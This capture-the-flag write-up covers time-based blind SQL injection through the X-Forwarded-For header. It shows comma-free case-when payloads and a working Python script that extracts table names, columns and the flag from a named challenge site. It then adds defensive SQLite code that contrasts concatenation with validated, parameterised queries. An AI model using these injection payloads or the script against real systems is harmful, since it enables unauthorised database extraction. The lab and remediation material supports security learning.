Opening the link shows "your ip is :xxx". Capture the request and add the header X-Forwarded-For: 192.168.1.1; sure enough, the IP returned is the one I added. That reminded me of the hint: everyone who attacks me gets recorded in the db! Sorting out the idea: the server must take the X-Forwarded-For value, store it in the database, then read it back out of the database. Adding a single quote and other characters, they come back unchanged. Try a time-based blind injection: construct 1' and if(length(database())=5,sleep(5),1) and '1'='1, and it turns out the comma is stripped. Switch to select case when instead: construct 1' and (select case when length(database())=5 then sleep(5) else 1 end) and '1'='1. With a database name length of 4 the response is delayed, confirming the injection exists. Next, write a script to run it.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

# Characters tried at each position. Note that '_' (and '%') are LIKE wildcards,
# so a '_' that "matches" means any character, not a literal underscore.
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{}@:\\/_-."
tableName = ""
columnName = ""
flag = ""
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# 40 is arbitrary; it only has to exceed the length of the field. When no new
# data shows up for a long while the run is finished, then move on to the next item.
for i in range(40):
    for char in chars:
        headers = {
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
            # Dump the table name
            # "X-FORWARDED-FOR": "1' and (select case when((select count(table_name) from information_schema.tables"
            #                    " where table_schema=database() and table_name like '" + tableName + char + "%')>0)"
            #                    " then sleep(3) else 1 end) and '1'='1",
            # Dump the second table
            # "X-FORWARDED-FOR": "1' and (select case when((select count(table_name) from information_schema.tables"
            #                    " where table_schema=database() and table_name !='client_ip' and table_name like '" + tableName + char + "%')>0)"
            #                    " then sleep(3) else 1 end) and '1'='1",
            # Got the flag table; now dump the column names
            # "X-FORWARDED-FOR": "1' and (select case when((select count(column_name) from information_schema.columns"
            #                    " where table_name='flag' and column_name like '" + columnName + char + "%')>0)"
            #                    " then sleep(3) else 1 end) and '1'='1",
            # Got the flag column; now dump the data
            "X-FORWARDED-FOR": "1' and (select case when ((select count(flag) from flag where flag like '" + flag + char + "%')>0)"
                               " then sleep(3) else 1 end) and '1'='1",
        }
        # A response that takes at least as long as the sleep() means the guess was right
        start = time.time()
        res = requests.get(url, headers=headers)
        end = time.time()
        if end - start >= 3:
            flag += char
            print(flag)
            break
Go grab a meal and the flag should be out by the time you are back.
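From the defender's side, the root cause in this challenge is the X-Forwarded-For value being spliced into the SQL text. The following is an added example, not code from this writeup or from the challenge itself: a small SQLite model of the "record the client IP" lookup, with the vulnerable concatenation beside a hardened version that first requires the header to be a literal IP address and then binds it as a query parameter. The table name client_ip is taken from the writeup; the stored rows, the function names and the use of SQLite in place of MySQL are assumptions. SQLite has no sleep(), so the demonstration payload is a plain tautology rather than the time-based case-when payload above; the splice point it abuses is the same.

```python
import ipaddress
import sqlite3


def make_db():
    """Constructed sample: an in-memory client_ip table with two stored addresses."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT NOT NULL)")
    conn.executemany("INSERT INTO client_ip (ip) VALUES (?)",
                     [("10.0.0.5",), ("192.168.1.1",)])
    return conn


def count_visits_unsafe(conn, xff):
    """VULNERABLE: the raw X-Forwarded-For value is pasted into the SQL string.

    A value such as  1' or '1'='1  turns the WHERE clause into a tautology, so
    every row matches even though no row holds the value '1'.
    """
    sql = "SELECT count(*) FROM client_ip WHERE ip = '" + xff + "'"
    return conn.execute(sql).fetchone()[0]


def parse_forwarded_ip(xff):
    """Take the first hop of X-Forwarded-For and insist that it is a literal IP.

    ipaddress.ip_address raises ValueError for anything that is not an IPv4 or
    IPv6 literal, so quotes, spaces and SQL keywords never reach the database.
    """
    first = xff.split(",")[0].strip()
    return str(ipaddress.ip_address(first))


def count_visits_safe(conn, xff):
    """HARDENED: validated value bound as a parameter, never concatenated."""
    ip = parse_forwarded_ip(xff)
    row = conn.execute("SELECT count(*) FROM client_ip WHERE ip = ?", (ip,)).fetchone()
    return row[0]


def record_ip_safe(conn, xff):
    """Store side of the same fix: parameterised INSERT of the validated address."""
    ip = parse_forwarded_ip(xff)
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    return ip


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print("unsafe lookup with payload matched", count_visits_unsafe(db, payload), "rows")
    try:
        count_visits_safe(db, payload)
    except ValueError as exc:
        print("hardened lookup rejected the header:", exc)
```

Validation alone is not enough to make the header trustworthy: the writeup sets X-Forwarded-For by hand and the server echoes it back, so the value identifies a client only when it is written by your own reverse proxy. Behind anything else, log the socket peer address instead and treat the header as untrusted input.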